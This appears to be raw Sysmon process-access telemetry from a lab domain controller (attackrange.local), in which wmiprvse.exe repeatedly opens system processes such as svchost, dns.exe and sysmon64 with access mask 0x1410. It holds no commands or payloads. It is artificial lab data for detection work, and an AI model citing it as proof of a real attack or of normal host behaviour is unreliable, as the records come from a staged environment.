RT4.dll+111bc 10341000x80000000000000001698008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001698000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697999Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697998Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.024{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:49.023{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 